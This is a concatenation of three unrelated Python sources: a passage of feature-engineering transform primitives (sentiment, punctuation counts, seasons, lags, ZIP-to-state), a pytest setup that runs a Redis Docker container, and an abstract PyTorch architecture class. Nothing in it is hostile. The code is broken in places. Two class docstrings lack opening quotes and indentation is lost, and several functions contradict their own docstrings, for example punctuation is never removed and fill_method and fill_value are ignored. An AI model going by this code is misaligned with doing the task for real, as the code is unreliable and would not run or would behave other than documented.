Given a list of strings assign a polarity score from -1 (negative text), to 0 (neutral text), to 1 (positive text).
The function returns a score for every given piece of text.
If a string is missing, return 'NaN'
Examples:
>>> x = ['He loves dogs', 'She hates cats', 'There is a dog', '']
>>> polarity_score = PolarityScore()
>>> polarity_score(x).tolist()
[0.677, -0.649, 0.0, 0.0]
"""
name = "polarity_score"
input_types = [NaturalLanguage]
return_type = Numeric
description_template = "the polarity of {} on a scale from -1 to 1"
def get_function(self):
def polarity_score(values):
result = []
            analyzer = SentimentIntensityAnalyzer()
            for value in values:
                result.append(analyzer.polarity_scores(value)['compound'])
return np.array(result)
return polarity_score
class PunctuationCount(TransformPrimitive):
"""Determines number of punctuation characters in a string.
Description:
Given list of strings, determine the number of punctuation characters in each string.
Looks for any of the following: !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
Examples:
>>> x = ['This is a test file.', 'This is second line', 'third line: $1,000']
>>> punctuation_count = PunctuationCount()
>>> punctuation_count(x).tolist()
[1.0, 0.0, 3.0]
"""
name = "punctuation_count"
input_types = [NaturalLanguage]
return_type = Numeric
description_template = "the number of punctuation characters in {}"
def get_function(self):
def punc_cnt(values):
result = []
for value in values:
cnt = 0
                for punc in string.punctuation:
                    # count every occurrence, not just distinct punctuation marks
                    cnt += value.count(punc)
result.append(cnt)
return np.array(result)
return punc_cnt
class Quarter(TransformPrimitive):
"""Determines the quarter of the year of a datetime
Examples:
>>> import pandas as pd
>>> quarter = Quarter()
>>> quarter([pd.to_datetime('2018-02-28'),
... pd.to_datetime('2018-08-15'),
... pd.to_datetime('2018-12-31'),
... pd.to_datetime('2018-05-01')]).tolist()
[1, 3, 4, 2]
"""
name = "quarter"
input_types = [Datetime]
return_type = Ordinal
description_template = "the quarter of the year of {}"
def get_function(self):
def quarter(values):
result = []
for value in values:
month = value.month
if 1 <= month <= 3:
result.append(1)
elif 4 <= month <= 6:
result.append(2)
elif 7 <= month <= 9:
result.append(3)
else:
result.append(4)
return np.array(result)
return quarter
class SameAsPrevious(TransformPrimitive):
"""Determines if a value is equal to the previous value in a list.
Description:
Compares a value in a list to the previous value and returns True if the value is equal to the previous value or False otherwise.
The first item in the output will always be False, since there is no previous element for the first element comparison.
Any nan values in the input will be filled using either a forward-fill or backward-fill method, specified by the fill_method argument.
The number of consecutive nan values that get filled can be limited with the limit argument.
Any nan values left after filling will result in False being returned for any comparison involving the nan value.
Args:
fill_method (str) : Method for filling gaps in series.
            Valid options are `backfill`, `bfill`, `pad`, `ffill`.
`pad / ffill`: fill gap with last valid observation.
`backfill / bfill`: fill gap with next valid observation.
Default is `pad`.
limit (int) : The max number of consecutive NaN values in a gap that can be filled.
Default is None.
Examples:
>>> same_as_previous = SameAsPrevious()
>>> same_as_previous([1, 2, 2, 4]).tolist()
[False, False, True, False]
The fill method for nan values can be specified
>>> same_as_previous_fillna = SameAsPrevious(fill_method="bfill")
>>> same_as_previous_fillna([1, None, 2, 4]).tolist()
[False, False, True, False]
The number of nan values that are filled can be limited
>>> same_as_previous_limitfill = SameAsPrevious(limit=2)
>>> same_as_previous_limitfill([1, None, None, None, 2, 3]).tolist()
[False, True, True, False, False, False]
"""
name = "same_as_previous"
input_types = [Numeric]
return_type = Numeric
description_template = "determines if a value is equal to the previous value in {}"
def __init__(self, fill_method='pad', limit=None):
self.fill_method = fill_method
self.limit = limit
def get_function(self):
def same_as_pre(values):
fill_values = values.fillna(method=self.fill_method, limit=self.limit)
result = [False]
if type(fill_values) is Series:
fill_values = fill_values.tolist()
for i in range(1, len(fill_values)):
if fill_values[i-1] == fill_values[i]:
result.append(True)
else:
result.append(False)
return np.array(result)
return same_as_pre
class SavgolFilter(TransformPrimitive):
"""Applies a Savitzky-Golay filter to a list of values.
Description:
        Given a list of values, return a smoothed list which increases the signal-to-noise ratio without greatly distorting the signal.
Uses the `Savitzky–Golay filter` method.
If the input list has less than 20 values, it will be returned as is.
Args:
        window_length (int) : The length of the filter window (i.e. the number of coefficients).
`window_length` must be a positive odd integer.
polyorder (int) : The order of the polynomial used to fit the samples.
`polyorder` must be less than `window_length`.
deriv (int) : Optional. The order of the derivative to compute.
This must be a nonnegative integer.
The default is 0, which means to filter the data without differentiating.
delta (float) : Optional. The spacing of the samples to which the filter will be applied.
This is only used if deriv > 0. Default is 1.0.
mode (str) : Optional. Must be 'mirror', 'constant', 'nearest', 'wrap' or 'interp'.
This determines the type of extension to use for the padded signal to which the filter is applied.
When `mode` is 'constant', the padding value is given by `cval`.
See the Notes for more details on 'mirror', 'constant', 'wrap', and 'nearest'.
            When the 'interp' mode is selected (the default), no extension is used.
Instead, a degree `polyorder` polynomial is fit to the last `window_length` values of the edges, and this polynomial is used to evaluate the last `window_length // 2` output values.
cval (scalar) : Optional. Value to fill past the edges of the input if `mode` is 'constant'.
Default is 0.0.
Examples:
>>> savgol_filter = SavgolFilter()
>>> data = [0, 1, 1, 2, 3, 4, 5, 7, 8, 7, 9, 9, 12, 11, 12, 14, 15, 17, 17, 17, 20]
>>> [round(x, 4) for x in savgol_filter(data).tolist()[:3]]
[0.0429, 0.8286, 1.2571]
We can control `window_length` and `polyorder` of the filter.
>>> savgol_filter = SavgolFilter(window_length=13, polyorder=3)
>>> [round(x, 4) for x in savgol_filter(data).tolist()[:3]]
[-0.0962, 0.6484, 1.4451]
We can control the `deriv` and `delta` parameters.
>>> savgol_filter = SavgolFilter(deriv=1, delta=1.5)
>>> [round(x, 4) for x in savgol_filter(data).tolist()[:3]]
[0.754, 0.3492, 0.2778]
We can use `mode` to control how edge values are handled.
>>> savgol_filter = SavgolFilter(mode='constant', cval=5)
>>> [round(x, 4) for x in savgol_filter(data).tolist()[:3]]
[1.5429, 0.2286, 1.2571]
"""
name = "savgol_filter"
input_types = [Numeric]
return_type = Numeric
description_template = "Applying Savitzky-Golay filter to {}"
def __init__(self, window_length=5, polyorder=3, deriv=0, delta=1.0, axis=-1, mode='interp', cval=0.0):
self.window_length = window_length
self.polyorder = polyorder
self.deriv = deriv
self.delta = delta
self.axis = axis
self.mode = mode
self.cval = cval
def get_function(self):
def sav_filter(values):
if self.mode == "interp" and self.window_length > len(values):
self.window_length = len(values)
if self.window_length % 2 == 0:
self.window_length -= 1
self.polyorder = self.window_length // 2
return savgol_filter(values, self.window_length, self.polyorder, self.deriv, self.delta, self.axis, self.mode, self.cval)
return sav_filter
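# Illustrative helper, not part of the original module: demonstrates the
# short-input handling implemented in SavgolFilter.get_function() above, where
# `window_length` (and, if needed, `polyorder`) are shrunk to fit the data when
# mode='interp'. The input values below are made up for the example.
def _savgol_short_input_example():
    smoother = SavgolFilter(window_length=7, polyorder=3)
    # Only four samples, so window_length is reduced to 3 and polyorder to 1
    # before scipy's savgol_filter is called.
    return smoother.get_function()([1.0, 2.0, 4.0, 8.0]).tolist()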
class ScorePercentile(TransformPrimitive):
"""Determines the percentile of each value against an array of scores.
Description:
Given a list of numbers, return the approximate percentile of each number compared to a given array of scores.
Args:
scores (array) : Array of values to which our input values are compared.
Examples:
>>> percentile = ScorePercentile(scores=list(range(1, 11)))
>>> percentile([1, 5, 10, 11, 0]).tolist()
[10.0, 50.0, 100.0, 100.0, 0.0]
"""
name = "score_percentile"
input_types = [Numeric]
return_type = Numeric
description_template = "the percentile of {} against scores"
def __init__(self, scores=[]):
self.scores = scores
def get_function(self):
def score_percent(values):
if len(self.scores) == 0:
self.scores = values
return np.array([stats.percentileofscore(self.scores, value) for value in values])
return score_percent
class Season(TransformPrimitive):
"""Determines the season of a given datetime.
Description:
Given a list of datetimes, return the season of each one (`winter`, `spring`, `summer`, or `fall`).
Uses the month of the datetime to determine the season.
Args:
hemisphere (str) : Specify northern or southern hemisphere.
Could be 'northern' or 'north' or 'southern' or 'south'.
Default is 'northern'.
Examples:
>>> from datetime import datetime
>>> times = [datetime(2019, 1, 1),
... datetime(2019, 3, 15),
... datetime(2019, 7, 20),
... datetime(2019, 12, 30)]
>>> season = Season()
>>> season(times).tolist()
['winter', 'spring', 'summer', 'winter']
We can specify the hemisphere as well.
>>> from datetime import datetime
>>> season_southern = Season(hemisphere='southern')
>>> season_southern(times).tolist()
['summer', 'fall', 'winter', 'summer']
"""
name = "season"
input_types = [Datetime]
return_type = Categorical
description_template = "the season of {}"
def __init__(self, hemisphere="northern"):
self.hemisphere = hemisphere.lower()
def get_function(self):
def season(values):
result = []
if self.hemisphere == "northern" or self.hemisphere == "north":
for value in values:
month = value.month
if 3 <= month <= 5:
result.append("spring")
elif 6 <= month <= 8:
result.append("summer")
elif 9 <= month <= 11:
result.append("fall")
else:
result.append("winter")
elif self.hemisphere == "southern" or self.hemisphere == "south":
for value in values:
month = value.month
if 3 <= month <= 5:
result.append("fall")
elif 6 <= month <= 8:
result.append("winter")
elif 9 <= month <= 11:
result.append("spring")
else:
result.append("summer")
return np.array(result)
return season
class Sign(TransformPrimitive):
"""Determines the sign of numeric values.
Description:
Given a list of numbers, returns 0, 1, -1 if the number is zero, positive, or negative, respectively.
If input value is NaN, returns NaN.
Examples:
>>> sign = Sign()
>>> sign([1., -2., 3., -4., 0]).tolist()
[1.0, -1.0, 1.0, -1.0, 0.0]
"""
name = "sign"
input_types = [Numeric]
return_type = Numeric
description_template = "the sign of {}"
def get_function(self):
def sign(values):
return np.sign(values)
return sign
class StopwordCount(TransformPrimitive):
"""Determines number of stopwords in a string.
Description:
Given a list of strings, determine the number of stopwords in each string.
Looks for any of the English stopwords defined in `nltk.corpus.stopwords`.
Case insensitive.
Examples:
>>> x = ['This is a test string.', 'This is second string', 'third string']
>>> stopword_count = StopwordCount()
>>> stopword_count(x).tolist()
[3.0, 2.0, 0.0]
"""
name = "stopword_count"
input_types = [NaturalLanguage]
return_type = Numeric
description_template = "the number of stopwords in {}"
def get_function(self):
def stop_cnt(values):
result = []
stop_words = stopwords.words('english')
for words in values.str.split():
cnt = 0
for word in words:
if word.lower() in stop_words:
cnt += 1
result.append(cnt)
return np.array(result)
return stop_cnt
class SubRegionCodeToRegion(TransformPrimitive):
"""Determines the region of a US sub-region.
Description:
Converts a ISO 3166-2 region code to a higher-level US region.
Possible values include the following: `['West', 'South', 'Northeast', 'Midwest']`
Examples:
>>> sub_region_code_to_region = SubRegionCodeToRegion()
>>> subregions = ["US-AL", "US-IA", "US-VT", "US-DC", "US-MI", "US-NY"]
>>> sub_region_code_to_region(subregions).tolist()
['south', 'midwest', 'northeast', 'south', 'midwest', 'northeast']
"""
name = "sub_region_code_to_region"
input_types = [SubRegionCode]
return_type = Categorical
description_template = "the region of {}"
def get_function(self):
def sub_to_region(values):
url = "https://raw.githubusercontent.com/cphalpert/census-regions/master/us%20census%20bureau%20regions%20and%20divisions.csv"
data = pandas.read_csv(url)
result = []
for value in values:
selected_data = data[data['State Code'] == value[-2:]]
result.append(selected_data['Region'].to_list()[0].lower())
return np.array(result)
return sub_to_region
class TitleWordCount(TransformPrimitive):
"""Determines the number of title words in a string.
Description:
Given a list of strings, determine the number of title words in each string.
A title word is defined as any word starting with a capital letter.
Words at the start of a sentence will be counted.
Examples:
>>> x = ['My favorite movie is Jaws.', 'this is a string', 'AAA']
>>> title_word_count = TitleWordCount()
>>> title_word_count(x).tolist()
[2.0, 0.0, 1.0]
"""
name = "title_word_count"
input_types = [NaturalLanguage]
return_type = Numeric
description_template = "the number of title words in {}"
def get_function(self):
def title_word_cnt(values):
result = []
for words in values.str.split():
cnt = 0
for word in words:
if word[0].isupper():
cnt += 1
result.append(cnt)
return np.array(result)
return title_word_cnt
class UpperCaseCount(TransformPrimitive):
"""Calculates the number of upper case letters in text.
Description:
Given a list of strings, determine the number of characters in each string that are capitalized.
Counts every letter individually, not just every word that contains capitalized letters.
Examples:
>>> x = ['This IS a string.', 'This is a string', 'aaa']
>>> upper_case_count = UpperCaseCount()
>>> upper_case_count(x).tolist()
[3.0, 1.0, 0.0]
"""
name = "upper_case_count"
input_types = [NaturalLanguage]
return_type = Numeric
description_template = "the number of upper case letters in {}"
def get_function(self):
def upper_cnt(values):
return values.str.count(pat='[A-Z]')
return upper_cnt
class UpperCaseWordCount(TransformPrimitive):
"""Determines the number of words in a string that are entirely capitalized.
Description:
Given a list of strings, determine the number of words in each string that are entirely capitalized.
Examples:
>>> x = ['This IS a string.', 'This is a string', 'AAA']
>>> upper_case_word_count = UpperCaseWordCount()
>>> upper_case_word_count(x).tolist()
[1.0, 0.0, 1.0]
"""
name = "upper_case_word_count"
input_types = [NaturalLanguage]
return_type = Numeric
description_template = "the number of words that are entirely capitalized in {}"
def get_function(self):
def upper_word_cnt(values):
result = []
for words in values.str.split():
cnt = 0
for word in words:
if word.isupper():
cnt += 1
result.append(cnt)
return np.array(result)
return upper_word_cnt
class URLToProtocol(TransformPrimitive):
Determines the protocol (http or https) of a URL.
Description:
Extracts the protocol of a URL using regex.
It will be either https or http.
Returns nan if the url doesn't contain a protocol.
Examples:
>>> url_to_protocol = URLToProtocol()
>>> urls = ['https://www.google.com', 'http://www.google.co.in',
... 'www.facebook.com']
>>> url_to_protocol(urls).to_list()
['https', 'http', nan]
"""
name = "url_to_protocol"
input_types = [URL]
return_type = Categorical
description_template = "the protocol of {}"
def get_function(self):
def url_to_protocol(values):
result = []
for value in values:
pat = re.findall('https|http', value)
if pat:
result.append(pat[0])
else:
result.append(np.nan)
return Series(result)
return url_to_protocol
class ZIPCodeToState(TransformPrimitive):
"""Extracts the state from a ZIPCode.
Description:
Given a ZIPCode, return the state it's in.
ZIPCodes can be 5-digit or 9-digit.
In the case of 9-digit ZIPCodes, only the first 5 digits are used and any digits after the first five are discarded.
Return nan if the ZIPCode is not found.
Examples:
>>> zipcode_to_state = ZIPCodeToState()
>>> states = zipcode_to_state(['60622', '94120', '02111-1253'])
>>> list(map(str, states))
['IL', 'CA', 'MA']
"""
name = "zip_code_to_state"
input_types = [ZIPCode]
return_type = Categorical
description_template = "the state from a ZIPCode {}"
def get_function(self):
def zip_to_state(values):
result = []
zipDb = ZipCodeDatabase()
for value in values:
result.append(zipDb[value[:5]].state)
return np.array(result)
return zip_to_state
class CountString(TransformPrimitive):
"""Determines how many times a given string shows up in a text field.
Examples:
>>> count_string = CountString(string="the")
>>> count_string(["The problem was difficult.",
... "He was there.",
... "The girl went to the store."]).tolist()
[1, 1, 2]
"""
name = "count_string"
input_types = [NaturalLanguage]
return_type = Numeric
def __init__(self, string = "", ignore_case = True, ignore_non_alphanumeric = False, is_regex = False, match_whole_words_only = False):
self.string = string
self.ignore_case = ignore_case
self.ignore_non_alphanumeric = ignore_non_alphanumeric
self.is_regex = is_regex
self.match_whole_words_only = match_whole_words_only
def get_function(self):
def count_string(array):
count = []
for value in array:
if self.ignore_case:
value = value.lower()
self.string = self.string.lower()
if self.ignore_non_alphanumeric:
filtered = filter(str.isalnum, value)
value = "".join(filtered)
if self.is_regex:
import re
temp = re.findall(self.string, value)
value = " ".join(temp)
if self.match_whole_words_only:
# Count whole-word matches; sum() over a single bool raised a TypeError here.
count.append(sum(1 for word in value.split() if word == self.string))
else: count.append(value.count(self.string))
return pandas.Index(count)
return count_string
class CumulativeTimeSinceLastFalse(TransformPrimitive):
"""Determines the time since last `False` value.
Description:
Given a list of booleans and a list of corresponding datetimes, determine the time at each point since the last `False` value.
Returns time difference in seconds.
`NaN` values are ignored.
Examples:
>>> cumulative_time_since_last_false = CumulativeTimeSinceLastFalse()
>>> booleans = [False, True, False, True]
>>> datetimes = [
... datetime(2011, 4, 9, 10, 30, 0),
... datetime(2011, 4, 9, 10, 30, 10),
... datetime(2011, 4, 9, 10, 30, 15),
... datetime(2011, 4, 9, 10, 30, 29)
... ]
>>> cumulative_time_since_last_false(datetimes, booleans).tolist()
[0.0, 10.0, 0.0, 14.0]
"""
name = "cumulative_time_since_last_false"
input_types = [DatetimeTimeIndex, Boolean]
return_type = Numeric
def get_function(self):
def cumulative_time_since_last_false(datetimes, booleans):
count = []
last_false = 0
for idx, val in enumerate(booleans):
if val == False:
last_false = idx
count.append(0.0)
else:
cum = datetimes[idx] - datetimes[last_false]
count.append(float(cum.total_seconds()))
return pandas.Index(count)
return cumulative_time_since_last_false
class CumulativeTimeSinceLastTrue(TransformPrimitive):
Determines the time (in seconds) since the last boolean value was `True`, given a datetime index column and a boolean column.
Examples:
>>> cumulative_time_since_last_true = CumulativeTimeSinceLastTrue()
>>> booleans = [False, True, False, True]
>>> datetimes = [
... datetime(2011, 4, 9, 10, 30, 0),
... datetime(2011, 4, 9, 10, 30, 10),
... datetime(2011, 4, 9, 10, 30, 15),
... datetime(2011, 4, 9, 10, 30, 30)
... ]
>>> cumulative_time_since_last_true(datetimes, booleans).tolist()
[nan, 0.0, 5.0, 0.0]
"""
name = "cumulative_time_since_last_true"
input_types = [DatetimeTimeIndex, Boolean]
return_type = Numeric
def get_function(self):
def cumulative_time_since_last_true(datetimes, booleans):
count = []
last_true = None
for idx, val in enumerate(booleans):
if val == True:
last_true = idx
count.append(0.0)
elif last_true is None:
# No True value seen yet, so the elapsed time is undefined (see docstring example).
count.append(np.nan)
else:
cum = datetimes[idx] - datetimes[last_true]
count.append(float(cum.total_seconds()))
return pandas.Index(count)
return cumulative_time_since_last_true
class DateToTimeZone(TransformPrimitive):
"""Determines the timezone of a datetime.
Description:
Given a list of datetimes, extract the timezone from each one.
Looks for the `tzinfo` attribute on `datetime.datetime` objects.
If the datetime has no timezone or the date is missing, return `NaN`.
Examples:
>>> date_to_time_zone = DateToTimeZone()
>>> dates = [datetime(2010, 1, 1, tzinfo=timezone("America/Los_Angeles")),
... datetime(2010, 1, 1, tzinfo=timezone("America/New_York")),
... datetime(2010, 1, 1, tzinfo=timezone("America/Chicago")),
... datetime(2010, 1, 1)]
>>> date_to_time_zone(dates).tolist()
['America/Los_Angeles', 'America/New_York', 'America/Chicago', nan]
"""
name = "date_to_time_zone"
input_types = [Datetime]
return_type = Categorical
def get_function(self):
def date_to_time_zone(dates):
time_zone = []
for value in dates:
if value.tzinfo:
time_zone.append(str(value.tzinfo))
else:
time_zone.append(np.nan)
return pandas.Index(time_zone)
return date_to_time_zone
class DayName(TransformPrimitive):
"""Transforms a date into the weekday name for the date.
Examples:
>>> day_name = DayName()
>>> dates = pd.Series([datetime(2016, 1, 1),
... datetime(2016, 2, 27),
... datetime(2017, 5, 29, 10, 30, 5),
... datetime(2018, 7, 18)])
>>> day_name(dates).tolist()
['Friday', 'Saturday', 'Monday', 'Wednesday']
"""
name = "day_name"
input_types = [Datetime]
return_type = Categorical
def get_function(self):
def day_name(dates):
days = []
day_name = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
for value in dates:
day = value.weekday()
days.append(day_name[day])
return pandas.Index(days)
return day_name
class GreaterThanPrevious(TransformPrimitive):
"""Determines if a value is greater than the previous value in a list.
Description:
Compares a value in a list to the previous value and returns True if the value is greater than the previous value or False otherwise.
The first item in the output will always be False, since there is no previous element for the first element comparison.
Any nan values in the input will be filled using either a forward-fill or backward-fill method, specified by the fill_method argument.
The number of consecutive nan values that get filled can be limited with the limit argument.
Any nan values left after filling will result in False being returned for any comparison involving the nan value.
Examples:
>>> greater_than_previous = GreaterThanPrevious()
>>> greater_than_previous([1, 2, 1, 4]).tolist()
[False, True, False, True]
"""
name = "greater_than_previous"
input_types = [Numeric]
return_type = Numeric
def __init__(self, fill_method = None, limit = None):
self.fill_method = fill_method
self.limit = limit
def get_function(self):
def greater_than_previous(numbers):
results = []
prev = None
for num in numbers:
if prev is None:
results.append(False)
else:
results.append(num > prev)
prev = num
return pandas.Index(results)
return greater_than_previous
class IsFirstOccurrence(TransformPrimitive):
"""Determines whether a value is the first occurrence of the value in a list.
Examples:
>>> is_first_occurrence = IsFirstOccurrence()
>>> is_first_occurrence([1, 2, 2, 3, 1]).tolist()
[True, True, False, True, False]
"""
name = "is_first_occurrence"
input_types = [Discrete]
return_type = Boolean
def get_function(self):
def is_first_occurrence(values):
results = []
for idx in range(len(values)):
found = False
for idx_before in range(idx):
if values.iloc[idx] == values.iloc[idx_before]:
results.append(False)
found = True
break
if not found:
results.append(True)
return pandas.Index(results)
return is_first_occurrence
class IsLastOccurrence(TransformPrimitive):
"""Determines whether a value is the last occurrence of the value in a list.
Examples:
>>> is_last_occurrence = IsLastOccurrence()
>>> is_last_occurrence([1, 2, 2, 3, 1]).tolist()
[False, False, True, True, True]
"""
name = "is_last_occurrence"
input_types = [Discrete]
return_type = Boolean
def get_function(self):
def is_last_occurrence(values):
results = []
for idx in range(len(values)):
found = False
for idx_after in range(idx + 1, len(values)):
if values.iloc[idx] == values.iloc[idx_after]:
results.append(False)
found = True
break
if not found:
results.append(True)
return pandas.Index(results)
return is_last_occurrence
class IsMaxSoFar(TransformPrimitive):
"""Determines if a number in a list is larger than every value before it.
Examples:
>>> is_max_so_far = IsMaxSoFar()
>>> is_max_so_far([2, 3, 5, 1, 3, 10]).tolist()
[True, True, True, False, False, True]
"""
name = "is_max_so_far"
input_types = [Numeric]
return_type = Boolean
def get_function(self):
def is_max_so_far(numbers):
max_val = None
results = []
for val in numbers:
if max_val is None or val >= max_val:
results.append(True)
max_val = val
else:
results.append(False)
return pandas.Index(results)
return is_max_so_far
class IsMinSoFar(TransformPrimitive):
"""Determines if a number in a list is smaller than every value before it.
Examples:
>>> is_min_so_far = IsMinSoFar()
>>> is_min_so_far([2, 3, 5, 1, 3, 10]).tolist()
[True, False, False, True, False, False]
"""
name = "is_min_so_far"
input_types = [Numeric]
return_type = Boolean
def get_function(self):
def is_min_so_far(numbers):
min_val = None
results = []
for val in numbers:
if min_val is None or val <= min_val:
results.append(True)
min_val = val
else:
results.append(False)
return pandas.Index(results)
return is_min_so_far
class IsWholeNumber(TransformPrimitive):
"""Determines whether a float is a whole number.
Description:
Given a list of floats, determine whether each number is whole.
If the number has any non-zero decimal value, return `False`.
If the number is missing, return `NaN`.
Examples:
>>> is_whole_number = IsWholeNumber()
>>> x = [1.0, 1.1, 1.00000001, 100.0, None]
>>> is_whole_number(x).tolist()
[True, False, False, True, nan]
"""
name = "is_whole_number"
input_types = [Numeric]
return_type = Boolean
def get_function(self):
def is_whole_number(numbers):
results = []
for val in numbers:
if math.isnan(val):
results.append(np.nan)
elif val == int(val):
results.append(True)
else:
results.append(False)
return pandas.Index(results)
return is_whole_number
class IsZero(TransformPrimitive):
"""Determines whether a number is equal to zero.
Examples:
>>> is_zero = IsZero()
>>> is_zero([1, 0, 0.00, 4]).tolist()
[False, True, True, False]
"""
name = "is_zero"
input_types = [Numeric]
return_type = Boolean
def get_function(self):
def is_zero(numbers):
results = []
for val in numbers:
if val == 0:
results.append(True)
else:
results.append(False)
return pandas.Index(results)
return is_zero
class Lag(TransformPrimitive):
"""Shifts an array of values by a specified number of periods.
Examples:
>>> lag = Lag()
>>> lag([1, 2, 3, 4, 5]).tolist()
[nan, 1.0, 2.0, 3.0, 4.0]
"""
name = "lag"
input_types = [Variable]
return_type = None
def __init__(self, periods = 1, fill_value = None):
self.periods = periods
self.fill_value = fill_value
def get_function(self):
def lag(numbers):
results = deque(numbers)
results.rotate(self.periods)
for i in range(self.periods):
results[i] = None
return pandas.Index(results)
return lag
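# Illustrative helper, not part of the original module: shows the `periods`
# argument of Lag through get_function() alone, so it relies only on code
# defined above (the returned inner function accepts any iterable of values).
def _lag_periods_example():
    lag_two = Lag(periods=2).get_function()
    # Expected result, by analogy with the docstring example: [nan, nan, 1.0, 2.0, 3.0]
    return lag_two([1, 2, 3, 4, 5]).tolist()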
class LessThanPrevious(TransformPrimitive):
"""Determines if a value is less than the previous value in a list.
Description:
Compares a value in a list to the previous value and returns True if the value is less than the previous value or False otherwise.
The first item in the output will always be False, since there is no previous element for the first element comparison.
Any nan values in the input will be filled using either a forward-fill or backward-fill method, specified by the fill_method argument.
The number of consecutive nan values that get filled can be limited with the limit argument.
Any nan values left after filling will result in False being returned for any comparison involving the nan value.
Examples:
>>> less_than_previous = LessThanPrevious()
>>> less_than_previous([1, 2, 1, 4]).tolist()
[False, False, True, False]
"""
name = "less_than_previous"
input_types = [Numeric]
return_type = Numeric
def __init__(self, fill_method = None, limit = None):
self.fill_method = fill_method
self.limit = limit
def get_function(self):
def less_than_previous(numbers):
results = []
prev = None
for num in numbers:
if prev is None:
results.append(False)
else:
results.append(num < prev)
prev = num
return pandas.Index(results)
return less_than_previous
class MeanCharactersPerWord(TransformPrimitive):
"""Determines the mean number of characters per word.
Description:
Given a list of strings, determine the mean number of characters per word in each string.
A word is defined as a series of any characters not separated by white space.
Punctuation is removed before counting.
If a string is empty or `NaN`, return `NaN`.
Examples:
>>> x = ['This is a test file', 'This is second line', 'third line $1,000']
>>> mean_characters_per_word = MeanCharactersPerWord()
>>> mean_characters_per_word(x).tolist()
[3.0, 4.0, 5.0]
"""
name = "mean_characters_per_word"
input_types = [NaturalLanguage]
return_type = Numeric
def get_function(self):
def mean_characters_per_word(sentences):
count = []
for sen in sentences:
words = str(sen).split(" ")
length = 0
for word in words:
length += len(word)
count.append(length/len(words))
return pandas.Index(count)
return mean_characters_per_word
|
import time
import pvl
import pytest
import docker
import numpy as np
from aiohttp.test_utils import loop_context
from web import redis_cache, pdsimage
TEST_REDIS_PORT = 6380
@pytest.fixture(scope='function', autouse=True)
def turn_off_sentry(mocker):
mocker.patch('web.constants.DSN', '')
mocker.patch('web.app.DSN', '')
@pytest.fixture(scope='session')
def loop():
with loop_context() as _loop:
yield _loop
@pytest.fixture(scope='session')
def event_loop(loop):
yield loop
@pytest.fixture(autouse=True)
async def redis_server_config(mocker):
mocker.patch('web.redis_cache.REDIS_PORT', TEST_REDIS_PORT)
@pytest.fixture(scope='session')
async def docker_container():
client = docker.from_env()
try:
client.images.get('redis:latest')
except docker.errors.ImageNotFound:
client.images.pull(
repository='redis',
tag='latest',
)
container = client.containers.run(
image='redis',
ports={'6379/tcp': f'{TEST_REDIS_PORT}'},
detach=True,
publish_all_ports=True,
)
try:
# wait for redis to be ready:
n = 0
for n, text in enumerate(container.logs(stream=True)):
if b'Server initialized' in text:
time.sleep(2)
break
elif n < 100:
continue
# Redis server ready to go
yield container
except Exception:
raise
finally:
container.kill()
container.remove()
@pytest.fixture(scope='function')
async def rcache(docker_container):
cache = await redis_cache.get_rcache()
await cache.flushall()
yield cache
await cache.flushall()
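# Illustrative sketch, not one of the project's real tests: a coroutine that
# consumes the `rcache` fixture above. It assumes the object returned by
# redis_cache.get_rcache() exposes the usual async redis `set`/`get` commands,
# in line with the `flushall()` calls already used in the fixture.
async def _example_rcache_roundtrip(rcache):
    await rcache.set('example-key', b'example-value')
    assert await rcache.get('example-key') == b'example-value'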
@pytest.fixture(scope='function')
async def label():
label = pvl.PVLModule({
'RECORD_BYTES': 3,
'^IMAGE': 66,
'PRODUCT_ID': 'testimg',
'IMAGE': {
'LINE_SAMPLES': 4,
'LINES': 2,
'BANDS': 3,
'SAMPLE_TYPE': 'MSB_INTEGER',
'SAMPLE_BITS': 16,
},
})
return label
DTYPE = np.dtype('>i2')
@pytest.fixture(scope='function')
async def image(label):
data = np.arange(1, 25).reshape((3, 2, 4))
data = data.astype(DTYPE)
im = pdsimage.PDSImage(data, label.copy())
return im
@pytest.fixture(scope='function')
async def gray_image(label):
data = np.arange(1, 9).reshape((1, 2, 4))
data = data.astype(DTYPE)
im = pdsimage.PDSImage(data, label.copy())
return im
|
from typing import Optional, Callable, Mapping, Any, List
import abc
import torch as tc
from drl.agents.architectures.abstract import Architecture
class StatelessArchitecture(Architecture, metaclass=abc.ABCMeta):
"""
Abstract class for stateless (i.e., memoryless) architectures.
"""
def __init__(
self,
w_init: Optional[Callable[[tc.Tensor], None]],
b_init: Optional[Callable[[tc.Tensor], None]],
**kwargs: Mapping[str, Any]):
"""
Args:
w_init (Optional[Callable[[torch.Tensor], None]]): Weight initializer.
b_init (Optional[Callable[[torch.Tensor], None]]): Bias initializer.
**kwargs (Mapping[str, Any]): Keyword arguments.
"""
super().__init__()
self._w_init = w_init
self._b_init = b_init
def _init_weights(self, sequential_module: tc.nn.Sequential) -> None:
for m in sequential_module:
if hasattr(m, 'weight'):
if self._w_init:
self._w_init(m.weight)
if hasattr(m, 'bias'):
if self._b_init:
self._b_init(m.bias)
@property
@abc.abstractmethod
def input_shape(self) -> List[int]:
"""
Returns:
Input shape without batch dimension.
"""
@property
@abc.abstractmethod
def output_dim(self) -> int:
"""
Returns:
Dimensionality of output features.
"""
@abc.abstractmethod
def forward(self, x, **kwargs):
"""
Forward method.
"""
class HeadEligibleArchitecture(StatelessArchitecture, metaclass=abc.ABCMeta):
"""
Abstract class for StatelessArchitecture classes
that can be used as prediction heads.
"""
def __init__(
self,
input_dim: int,
output_dim: int,
w_init: Callable[[tc.Tensor], None],
b_init: Callable[[tc.Tensor], None],
**kwargs: Mapping[str, Any]):
"""
Args:
input_dim: Input dimensionality.
Note that for HeadEligibleArchitectures, the input is assumed
to be one-dimensional.
output_dim: Output dimensionality.
w_init: Weight initializer.
b_init: Bias initializer.
**kwargs: Keyword arguments.
"""
super().__init__(w_init, b_init)
self._input_dim = input_dim
self._output_dim = output_dim
@property
def input_shape(self) -> List[int]:
shape = [self._input_dim]
return shape
@property
def output_dim(self) -> int:
return self._output_dim
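# Minimal sketch, not part of the library: one way a concrete prediction head
# could subclass HeadEligibleArchitecture. It assumes Architecture ultimately
# derives from torch.nn.Module (as the forward()/parameter usage above implies);
# the class name and layer choice are illustrative.
class LinearHead(HeadEligibleArchitecture):
    def __init__(self, input_dim, output_dim, w_init, b_init, **kwargs):
        super().__init__(input_dim, output_dim, w_init, b_init, **kwargs)
        # A single linear layer, wired through the base-class init hook.
        self._network = tc.nn.Sequential(tc.nn.Linear(input_dim, output_dim))
        self._init_weights(self._network)

    def forward(self, x, **kwargs):
        return self._network(x)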
|
